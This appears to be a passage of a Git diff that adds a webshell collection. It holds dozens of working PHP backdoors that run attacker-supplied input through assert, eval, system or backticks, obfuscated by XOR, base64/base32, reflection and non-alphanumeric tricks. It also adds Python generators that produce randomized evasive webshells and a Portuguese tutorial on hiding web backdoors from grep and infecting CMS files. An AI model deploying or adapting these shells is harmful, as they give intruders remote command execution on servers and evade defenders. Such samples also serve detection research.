filter_var($_REQUEST['x'], FILTER_CALLBACK, array('options' => 'assert'));
?>
<?php
filter_var_array(array('test' => $_REQUEST['x']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
?>

4
php/2020.08.20.18.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
$a($_POST['x']);
?>

6
php/2020.08.20.19.php Normal file
View File

@@ -0,0 +1,6 @@
<?php
$a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
$b='_'.'P'.'O'.'S'.'T';
$c=$$b;
$a($c['x']);
?>

4
php/2020.08.20.20.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['x']);

15
php/Shu1337.php Normal file
View File

File diff suppressed because one or more lines are too long

25
php/YXNzZXJ0YWE.php Normal file
View File

@@ -0,0 +1,25 @@
<?php
/**
* YXNzZXJ0YWE=
*/
class Example
{
public function fn()
{
}
}
$reflector = new ReflectionClass('Example');
$zhushi = substr(($reflector->getDocComment()), 7, 12);
$zhushi = base64_decode($zhushi);
$zhushi = substr($zhushi, 0, 6);
//
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
print_r($$_request);
}
}
$zhushi($_value);

9
php/ass.php Normal file
View File

@@ -0,0 +1,9 @@
<?php
/**
* Noticed: (PHP 5 >= 5.3.0, PHP 7)
*
*/
$password = "LandGrey";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
?>

69
php/bypass-with-base32.php Normal file
View File

@@ -0,0 +1,69 @@
<?php
class ZQIH{
public $a = null;
public $b = null;
public $c = null;
function __construct(){
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
$this->a = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->LGZOJH = @base32_decode($this->a);
@eval/*sopupi3240-=*/("/*iSAC[FH*/".$this->LGZOJH."/*iSAC[FH*/");
}}}
new ZQIH();
function base32_encode($input) {
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
$output = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($input); $i < $j; $i++) {
$v <<= 8;
$v += ord($input[$i]);
$vbits += 8;
while ($vbits >= 5) {
$vbits -= 5;
$output .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);
}
}
if ($vbits > 0) {
$v <<= (5 - $vbits);
$output .= $BASE32_ALPHABET[$v];
}
return $output;
}
function base32_decode($input) {
$output = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($input); $i < $j; $i++) {
$v <<= 5;
if ($input[$i] >= 'a' && $input[$i] <= 'z') {
$v += (ord($input[$i]) - 97);
} elseif ($input[$i] >= '2' && $input[$i] <= '7') {
$v += (24 + $input[$i]);
} else {
exit(1);
}
$vbits += 5;
while ($vbits >= 8) {
$vbits -= 8;
$output .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);
}
}
return $output;
}
?>

11
php/bypass2021-01-04-01.php Normal file
View File

@@ -0,0 +1,11 @@
<?php
function x()
{
return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";
}
eval(x());
?>

377
php/cotent01.md Normal file
View File

@@ -0,0 +1,377 @@
Esse pequeno post é focado em uma das diferentes técnicas que venho estudando no PHP, mas direcionando no quesito de variação de código para backdoor web.
O cenário de uso dos exemplos abaixo é um pensamento fora da caixa, dando exit() no básico usado em muitos códigos backdoor.
Foquei nas variáveis globais GET ,POST ,REQUEST.
#### As functions mais usadas:
```
(PHP 4, PHP 5, PHP 7)
shell_exec — Executa um comando via shell e retorna a saída inteira como uma string
string shell_exec ( string $cmd )
EXEC-> php -r 'shell_exec("ls -la");'
(PHP 4, PHP 5, PHP 7)
system — Executa um programa externo e mostra a saída
string system ( string $command [, int &$return_var ] )
EXEC-> php -r 'system("ls -la");'
(PHP 4, PHP 5, PHP 7)
exec — Executa um programa externo
string exec ( string $command [, array &$output [, int &$return_var ]] )
EXEC-> php -r 'exec("ls -la",$var);print_r($var);'
(PHP 4, PHP 5, PHP 7)
passthru — Executa um programa externo e mostra a saída crua
void passthru ( string $command [, int &$return_var ] )
EXEC-> php -r 'passthru("ls -la",$var);'
```
#### Implementação simples:
```
shell_exec:
if(isset($_REQUEST['cmd'])) { $cmd=shell_exec($_REQUEST['cmd']);
print_r($cmd);}
system:
if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }
exec:
if(isset($_REQUEST['cmd'])) { exec($_REQUEST['cmd']); }
passthru:
if(isset($_REQUEST['cmd'])) { passthru($_REQUEST['cmd']); }
```
Podemos usar as mesmas functions, porem de forma elaborada evitando que um simples grep -E revele nosso acesso.
#### DICAS:
- Uso de shellcode em valores fixos;
- Array é vida! use sem moderação;
- Concatenação de functions nativas & definição de variáveis.
- base64_decode - encode(data) , bin2hex , error_reporting(0)
- Use requests (get or post) que já existam no sistema;
- Estude a criação de propriedades maliciosas em classs do sistema, crie suas functions;
- Manuseio de valores da variável global $_SERVER;
- Estude métodos de infeção para arquivos CMSs feitos em PHP;
#### Vamos para os exemplos
**EXEMPLO 01**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
3. [DEFINE](http://php.net/manual/pt_BR/function.define.php)
4. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: c3lzdGVt=system ,dW5hbWUgLWE7bHM7=uname -a;ls; ,aWQ==id
**CODE:**
```
(error_reporting(0).($__=@base64_decode("c3lzdGVt")).$__(base64_decode("aWQ="))
.define("_","dW5hbWUgLWE7bHM7").$__(base64_decode(_)).exit);
```
Execução: curl -v 'http://localhost/shell.php'
**EXEMPLO 02**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
3. [ISSET](http://php.net/manual/pt_BR/function.isset.php)
4. [PRINT](http://php.net/manual/pt_BR/function.print.php)
5. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: c3lzdGVt=system
**CODE:**
```
(error_reporting(0).($__=@base64_decode("c3lzdGVt"))
.print($__(isset($_REQUEST[0])?$_REQUEST[0]:NULL)).exit);
```
Execução: curl -v 'http://localhost/shell.php?0=id'
**
****EXEMPLO 03**Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
3. [CREATE_FUNCTION](http://php.net/manual/pt_BR/function.create-function.php) - Cria uma função anônima (lambda-style)
4. [SHELL_EXEC](http://php.net/manual/pt_BR/function.shell-exec.php)
5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: ZWNobyhzaGVsbF9leGVjKCRfKSk7=echo(shell_exec($_));
**CODE:**
```
(error_reporting(0)).($_=$_REQUEST[0])
.($__=@create_function('$_',base64_decode("ZWNobyhzaGVsbF9leGVjKCRfKSk7"))).($__($_).exit);
```
Execução: curl -v 'http://localhost/shell.php?0=id'
**EXEMPLO 04**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
3. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: $_GET[1]=Nome da function, $_GET[2]=comando que será executado
**CODE:**
```
(error_reporting(0).($_=@$_GET[1]).($_($_GET[2])).exit);
```
Execução: curl -v 'http://localhost/shell.php?1=system&2=id;uname' **EXEMPLO 05** Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [EXTRACT](http://php.net/manual/pt_BR/function.extract.php)
3. [GET_DEFINED_VARS](http://php.net/manual/pt_BR/function.get-defined-vars.php)
4. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
5. [DEFINE](http://php.net/manual/pt_BR/function.define.php)
6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: $_REQUEST[1]=Nome da function, $_REQUEST[2]=comando que será executado **CODE:**
```
(error_reporting(0)).(extract($_REQUEST, EXTR_PREFIX_ALL))
.($_=@get_defined_vars()['_REQUEST']).(define('_',$_[2])).(($_[1](_))).exit;
```
Execução: curl -v 'http://localhost/shell.php?1=system&2=id;uname'
```
```
**EXEMPLO 06**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [EXPLODE](http://php.net/manual/pt_BR/function.explode.php)
3. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
4. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: SFRUUF9VU0VSX0FHRU5U=HTTP_USER_AGENT
**CODE:**
```
(error_reporting(0)).($_=@explode(',',$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]))
.($_[0]("{$_[1]}")).exit;
```
Execução: curl -v 'http://localhost/shell.php' --user-agent 'system,id;ls -la'
```
```
**EXEMPLO 07**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [GET_DEFINED_VARS](http://php.net/manual/pt_BR/function.get-defined-vars.php)
3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
4. [VARIABLE SHELLCODE](https://pt.wikipedia.org/wiki/Shellcode)
5. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: \x30=0, \x73=s, \x79=y , \x73=s, \x74=t, \x65=e, \x6D=m
**CODE:**
```
(error_reporting(0)).($_[0][]=@$_GET["\x30"])
.($_[1][] = "\x73").($_[1][] = "\x79").($_[1][] = "\x73")
.($_[1][] = "\x74").($_[1][] = "\x65").($_[1][] = "\x6D")
.($__=@get_defined_vars()['_'][1]).($___.=$__[0])
.($___.=$__[1]).($___.=$__[2]).($___.=$__[3])
.($___.=$__[4]).($___.=$__[5]).(($___("{$_[0][0]}")).exit);
```
Execução: curl -v 'http://localhost/shell.php?0=id;uname%20-a'
**EXEMPLO 08**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [STR_REPLACE](http://php.net/manual/pt_BR/function.str-replace.php)
3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
Variáveis: $_REQUEST[0]=Comando que será executado
**CODE:**
```
(error_reporting(0)).(str_replace(['$','@','#'],''
,'s$##y@#$@#$@#$@s$#$@#$@#$@$te$#@#$m')).($_("{$_REQUEST[0]}"));
```
Execução: curl -v 'http://localhost/shell.php?0=id
```
```
**
****EXEMPLO 09**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [STR_REPLACE](http://php.net/manual/pt_BR/function.str-replace.php)
3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
4. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
Variáveis: $_POST['shellrox']=Comando que será executado
**CODE:**
```
(error_reporting(0)).($_=[("\x73\x79").("\x73")
.("\x74\x65\x6d"),"\x73\x68\x65\x6c","\x6c\x72\x6f\x78"])
.($_[0]($_POST[$_[1].$_[2]]));
```
Execução: curl -d "shellrox=id;uname -a" -X POST 'http://localhost/shell.php'
```
```
**
****EXEMPLO 10** Functions:
1. [NON ALPHA NUMERIC](http://www.thespanner.co.uk/2012/08/21/php-nonalpha-tutorial/)
2. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
3. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
**CODE:**
```
$_=""; # we need a blank string to start
$_[+$_]++; # access part of the string to convert to an array
$_=$_.""; # convert the array into a string of "Array"
$_=$_[+""]; # access the 0 index of the string "Array" which is "A"
# INCREMENTANDO VALORES PARA ACHAR AS LETRAS
# NO CASO QUERO MONTAR A STRING SYSTEM
($_++); #A
($_++); #B
($_++); #C
($_++); #D
# PRIMEIRA LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO
($___[]=$_++);#E
($_++); #F
($_++); #G
($_++); #H
($_++); #I
($_++); #J
($_++); #K
($_++); #L
```
`# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#M
```
($_++); #N
($_++); #O
($_++); #P
($_++); #Q
($_++); #R
```
`# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#S
`# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#T
```
($_++); #U
($_++); #V
($_++); #W
($_++); #X
```
`# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#Y
```
($_++);#Z
# DEBUG DO ARRAY:
/* Array
(
[0] => E
[1] => M
[2] => S
[3] => T
[4] => Y
)
*/
# MONTAR STRING COM OS CAMPOS DO ARRAY $___
$_____=$___[2].$___[4].$___[2].$___[3].$___[0].$___[1];
# USANDO TÉCNICA DE FUNCTION ANONIMA PARA EXECUÇÃO
$_____('id;uname -a');
VERSÃO MINIMALISTA:
($_="").($_[+$_]++).($_=$_."").($_=$_[+""]).($_++)
.($_++).($_++).($_++).($___[]=$_++).($_++).($_++)
.($_++).($_++).($_++).($_++).($_++).($___[]=$_++)
.($_++).($_++).($_++).($_++).($_++).($___[]=$_++)
.($___[]=$_++).($_++).($_++).($_++).($_++)
.($___[]=$_++).($_++)
.($_____=$___[2].$___[4].$___[2].$___[3].$___[0].$___[1])
.($_____('id;uname -a'));
```
Execução: curl -v 'http://localhost/shell.php'
#### Observação: Existem outras milhares de técnicas, e tentarei fazer outros posts sobre.
#### Referências
- http://php.net/manual/en/language.operators.execution.php#language.operators.execution
- https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell
- http://www.businessinfo.co.uk/labs/talk/Nonalpha.pdf
- http://php.net/manual/pt_BR/function.create-function.php
- https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html
- http://web.archive.org/web/20120427221212/http://h.ackack.net/tiny-php-shell.html
- http://php.net/manual/pt_BR/function.extract.php
- http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
- https://www.akamai.com/cn/zh/multimedia/documents/report/akamai-security-advisory-web-shells-backdoor-trojans-and-rats.pdf
- https://aw-snap.info/articles/backdoor-examples.php
- http://php.net/manual/pt_BR/reserved.variables.server.php
- http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/
- https://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
- http://php.net/manual/en/functions.variable-functions.php
- http://php.net/manual/pt_BR/function.exec.php
- http://php.net/manual/pt_BR/function.shell-exec.php
- http://php.net/manual/pt_BR/function.system.php
- http://php.net/manual/pt_BR/function.passthru.php
- http://php.net/manual/pt_BR/function.get-defined-vars.php
- http://php.net/manual/pt_BR/function.extract.php

59
php/create_code_with_xor.py Normal file
View File

@@ -0,0 +1,59 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# name: yihuo.py
# http://www.opensource.org/licenses/mit-license
# MIT License
# from: https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
# Copyright (c) 2020
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import string
from urllib.parse import quote
keys = list(range(65)) + list(range(91, 97)) + list(range(123, 127))
results = []
for i in keys:
for j in keys:
asscii_number = i ^ j
if (asscii_number >= 65 and asscii_number <= 90) or (asscii_number >= 97 and asscii_number <= 122):
if i < 32 and j < 32:
temp = (
f'{chr(asscii_number)} = ascii:{i} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i < 32 and j >= 32:
temp = (
f'{chr(asscii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i >= 32 and j < 32:
temp = (
f'{chr(asscii_number)} = {chr(i)} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
else:
temp = (f'{chr(asscii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
results.sort(key=lambda x: x[1], reverse=False)
for low_case in string.ascii_lowercase:
for result in results:
if low_case in result:
print(result[0])
for upper_case in string.ascii_uppercase:
for result in results:
if upper_case in result:
print(result[0])

81
php/create_webshell_with_py.py Normal file
View File

@@ -0,0 +1,81 @@
import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())

1
php/get1.php Normal file
View File

@@ -0,0 +1 @@
<?=`$_GET[C]`?>

27
php/getConstants.php Normal file
View File

@@ -0,0 +1,27 @@
<?php
class Test
{
const a = 'As';
const b = 'se';
const c = 'rt';
public function __construct()
{
}
}
$para1;
$para2;
$reflector = new ReflectionClass('Test');
for ($i=97; $i <= 99; $i++) {
$para1 = $reflector->getConstant(chr($i));
$para2.=$para1;
}
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
$para2($_value);

24
php/getConstants2.php Normal file
View File

@@ -0,0 +1,24 @@
<?php
class Test
{
const a = array(1=>'aS',2=>'se',3=>'rT');
public function __construct()
{
}
}
$refl = new ReflectionClass('Test');
foreach ($refl->getConstants() as $key => $value) {
foreach ($value as $key => $value1) {
$value2.=$value1;
}
}
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
$value2($_value);

43
php/php_webshell.py Normal file
View File

@@ -0,0 +1,43 @@
import random
#author: pureqh
#github: https://github.com/pureqh/webshell
shell = '''<?php
class {0}{3}
public ${1} = null;
public ${2} = null;
public ${6} = null;
function __construct(){3}
$this->{1} = 'ZXZhbCgkX1BPU';
$this->{6} = '1RbYV0pOw==';
$this->{2} = @base64_decode($this->{1}.$this->{6});
@eval({5}.$this->{2}.{5});
{4}{4}
new {0}();
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
parameter1 = random_name(5)
parameter2 = random_name(6)
lef = '''{'''
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
parameter3 = random_name(6)
shellc = shell.format(className,parameter1,parameter2,lef,rig,disrupt,parameter3)
return shellc
if __name__ == '__main__':
print (build_webshell())

1
php/webshell-without-alphanumeric2.php Normal file
View File

@@ -0,0 +1 @@
<?=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);

1
tanjiti/webshellSample Submodule

Submodule tanjiti/webshellSample added at ccf0cce24c

1
tdifg/WebShell Submodule

Submodule tdifg/WebShell added at bb669471d2

1
threedr3am/JSP-Webshells Submodule

Submodule threedr3am/JSP-Webshells added at 77b0da57a9

1
vnhacker1337/Webshell Submodule

Submodule vnhacker1337/Webshell added at ac08d6ddbc

1
webshellpub/awsome-webshell Submodule

Submodule webshellpub/awsome-webshell added at 3e29e894a7

1
xl7dev/WebShell Submodule

Submodule xl7dev/WebShell added at f7cd87feb5

1
ysrc/webshell-sample Submodule

Submodule ysrc/webshell-sample added at dbaeee1622